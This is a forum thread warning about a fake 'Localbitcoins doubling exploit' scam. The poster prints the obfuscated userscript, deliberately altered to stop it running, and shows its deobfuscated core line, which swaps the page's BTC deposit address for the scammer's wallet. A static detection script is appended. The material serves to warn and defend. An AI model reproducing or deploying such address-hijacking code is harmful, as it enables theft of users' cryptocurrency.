Topic: Fake "Localbitcoin doubling BTC exploit script" scam (Read 237 times)

legendary
Activity: 1750
Merit: 1115
Good catch! I wonder how changing the timezone can even be done by a JS script, that's totally handled on the server-side. So basically what the script does is change the bitcoin address through DOM manipulation. I think as part of security on LBC's end, they should either ask to confirm the address on the next page before sending a transaction or force everyone to use 2FA.
legendary
Activity: 2758
Merit: 6830
I'm creating this thread to warn people about this scam, which I have seen multiple times in the forum, and to serve as a reference link for a type 1 flag on the user (and future ones).

Archive of his (locked) thread: https://archive.is/flfGm

User in question (will update if others show up):
Tempates134 (flag)

Small description about the scam:
The user will post the link to a PDF teaching how to use a Localbitcoin exploit (P.S: There are variations of this scam where the user uses G2A or Bitpay) with an encoded/obfuscated JS script.

Here is the PDF. And this is what the script looks like (changed a few parts of it to avoid people running it by mistake):
Code:
// ==UserScript==
// @name         Timezone Change
// @namespace    TimezoneLocalbitcoins
// @version      1.0
// @description  Script changes the time zone for your account in localbitcoins database.
// @author       Kimby
// @match        https://*/*
// @grant        none
// ==/UserScript==

(function() {
    'use strict';

var _0x4b2d=['\x5a\x32\x56\x30\x52\x57\x78\x6c\x62\x57\x56\x75\x64\x48\x4e\x43\x65\x55\x4e\x73\x59\x58\x4e\x7a\x54\x6d\x46\x74\x5a\x51\x3d\x3d'];(function(_0x549b3d,_0x9dfcb9){var _0x407320=function(_0x52cb3){while(--_0x52cb3){_0x549b3d['push'](_0x549b3d['shift']());}};_0x407320(++_0x9dfcb9);}(_0x4b2d,0x123));var _0x1beb=function(_0x14c375,_0x299c40){_0x14c375=_0x14c375-0x0;var _0xe887b2=_0x4b2d[_0x14c375];if(_0x1beb['SFKNYk']===undefined){(function(){var _0x58f6da;try{var _0x38af58=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x58f6da=_0x38af58();}catch(_0x17c4aa){_0x58f6da=window;}var _0x5f39f1='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x58f6da['atob']||(_0x58f6da['atob']=function(_0x16c94a){var _0x54cecb=String(_0x16c94a)['replace'](/=+$/,'');for(var _0x145cb2=0x0,_0x59bc1a,_0x2a005c,_0x3c3605=0x0,_0x10d118='';_0x2a005c=_0x54cecb['charAt'](_0x3c3605++);~_0x2a005c&&(_0x59bc1a=_0x145cb2%0x4?_0x59bc1a*0x40+_0x1a005c:_0x2b005c,_0x145cb2++%0x4)?_0x10d118+=String['fromCharCode'](0xff&_0x59bc1a>>(-0x2*_0x145cb2&0x6)):0x0){_0x2a005c=_0x5f39f1['indexOf'](_0x2a005c);}return _0x10d118;});}());_0x1beb['TxZTNZ']=function(_0x2f4f54){var _0x2d48b1=atob(_0x2f4f54);var _0x4f036f=[];for(var _0x14ab3d=0x0,_0x16c069=_0x2d48b1['length'];_0x14ab3d<_0x16c069;_0x14ab3d++){_0x4f036f+='%'+('00'+_0x2d48b1['charCodeAt'](_0x14ab3d)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x4f036f);};_0x1beb['gcPvZD']={};_0x1beb['SFKNYk']=!![];}var _0x42c47f=_0x1beb['gcPvZD'][_0x14c375];if(_0x42c47f===undefined){_0xe887b2=_0x1beb['TxZTNZ'](_0xe887b2);_0x1beb['gcPvZD'][_0x14c375]=_0xe887b2;}else{_0xe887b2=_0x22c47f;}return 
_0xe887b2;};document[_1x0beb('0x0')]('\x62\x69\x74\x63\x6f\x69\x6e\x2d\x61\x64\x64\x72\x65\x73\x73\x20\x62\x69\x74\x63\x6f\x69\x6e\x2d\x61\x64\x64\x72\x65\x73\x73\x2d\x63\x6f\x6e\x74\x72\x6f\x6c\x73')[0x0]['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x31\x46\x56\x6a\x32\x71\x36\x78\x35\x41\x35\x43\x45\x64\x53\x52\x31\x76\x72\x45\x72\x38\x44\x57\x53\x78\x41\x43\x78\x4e\x79\x4e\x6f\x73';

})();

It supposedly changes the timezone of the website or does other stuff (varies a lot) to make you receive your coins doubled, or receive a product you purchased (when it's about G2A or Bitpay) along with a refund. But all the script does is change the BTC deposit address on these websites to one owned by the hacker. You will send the coins thinking you are sending to the real address, to then use the exploit, but nothing will ever happen.

You can partially deobfuscate the code on https://lelinhtinh.github.io/de4js/ and see that it changes the address on Localbitcoin to "1FVj2q6x5A5CEdSR1vrEr8DWSxACxNyNos":
Code:
document[_1x0beb('0x0')]('bitcoin-address bitcoin-address-controls')[0x0]['innerHTML'] = '1FVj2q6x5A5CEdSR1vrEr8DWSxACxNyNos';

Please NEVER trust any of these random scripts, especially if it's an encoded/obfuscated JS script (as shown above). You can't know what it does, and 99% of the time it does something it shouldn't. Stay safe.
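A static triage of this kind of userscript, as an added example that is not part of the original post or of any tool mentioned in it: it decodes the `\xNN` escapes and Base64 string table as plain text, without running the script, and reports DOM write sinks, address-shaped strings and a match-every-site header. The function names, the constructed sample and the placeholder address `1XXX…` are assumptions made for illustration.

```javascript
// Static triage of an obfuscated userscript: text is decoded, never evaluated.
const hexDecode = (src) =>
  src.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));

// Return the decoded text if a string literal is printable Base64, else null.
function tryBase64(lit) {
  if (lit.length < 8 || lit.length % 4 !== 0 || !/^[A-Za-z0-9+\/]+={0,2}$/.test(lit)) return null;
  try {
    const out = atob(lit);
    return /^[\x20-\x7e]+$/.test(out) ? out : null;
  } catch {
    return null;
  }
}

// Legacy Base58 address shape only; the checksum is not verified here.
const ADDRESS_RE = /\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b/g;
const DOM_WRITE_RE = /\b(?:innerHTML|outerHTML|innerText|textContent|insertAdjacentHTML)\b/g;

function analyzeUserscript(src) {
  const decoded = hexDecode(src);
  // Single-quoted literals after hex decoding; candidates for the Base64 string table.
  const literals = [...decoded.matchAll(/'([^'\\]*)'/g)].map((m) => m[1]);
  const base64Strings = literals.map(tryBase64).filter(Boolean);
  const haystack = decoded + '\n' + base64Strings.join('\n');
  return {
    matchesEverySite: /@match\s+(?:\*|https?):\/\/\*\/\*/.test(src),
    base64Strings,
    domWrites: [...new Set(haystack.match(DOM_WRITE_RE) || [])],
    addresses: [...new Set(haystack.match(ADDRESS_RE) || [])],
  };
}

// Constructed sample in the same style as the script above (placeholder address).
const toHex = (s) =>
  [...s].map((c) => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const FAKE_ADDR = '1' + 'X'.repeat(32);
const SAMPLE = [
  '// @name         Timezone Change',
  '// @match        https://*/*',
  `var _0xa=['${toHex(btoa('getElementsByClassName'))}'];`,
  `document[_0xb('0x0')]('${toHex('bitcoin-address')}')[0x0]['${toHex('innerHTML')}']='${toHex(FAKE_ADDR)}';`,
].join('\n');

console.log(analyzeUserscript(SAMPLE));
```

A script whose stated purpose has nothing to do with payments but which yields both a DOM write and an address-shaped string is the pattern described in this thread.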